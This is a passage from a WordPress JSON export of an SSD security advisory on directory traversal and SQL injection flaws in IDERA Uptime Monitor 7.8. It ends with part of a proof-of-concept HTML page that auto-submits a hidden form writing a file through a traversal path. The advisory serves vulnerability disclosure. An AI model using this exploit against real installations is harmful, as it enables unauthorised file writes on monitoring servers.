class=\"crayon-s\">&#8220;document.form.submit()&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532c5703004677-18\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">form <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;form&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;..\/main.php?section=ERDCInstance&amp;subsection=add&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532c5703004677-19\"><span class=\"crayon-v\">method<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;post&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532c5703004677-20\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;file_name&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;&#8230;&#8230;&#8230;.test.txt&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532c5703004677-21\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;script&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532c5703004677-22\"><span class=\"crayon-v\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532c5703004677-23\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;category&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;agentless&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532c5703004677-24\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;isWizard&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;1&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532c5703004677-25\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;wizardPage&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;1&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532c5703004677-26\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;wizardNumPages&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;2&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532c5703004677-27\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;wizardTask&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;pageContinue&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532c5703004677-28\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;visitedPage[1]&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;1&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532c5703004677-29\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;fromGet2Post&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;true&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532c5703004677-30\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">img <\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;\/images\/InProgress.gif&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532c5703004677-31\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532c5703004677-32\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532c5703004677-33\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0083 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/pf-button.gif\" alt=\"Print Friendly\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3223\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/pf-button.gif\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Thu, 08 Jun 2017 07:23:23 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describe three (3) vulnerabilities found in IDERA Uptime Monitor version 7.8. &#8220;IDERA Uptime Monitor is a Proactively monitor physical servers, virtual machines, network devices, applications, and services across multiple platforms running on-premise, remotely, or in the Cloud. Uptime Infrastructure Monitor provides a unified view of IT environment health and a &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3223\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 IDERA Uptime Monitor Multiple Vulnerabilities<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11680,10757,12096],"class_list":["post-7895","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-directory-traversal","tag-securiteam-secure-disclosure","tag-sql-injection"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7895","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=7895"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7895\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=7895"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=7895"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=7895"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}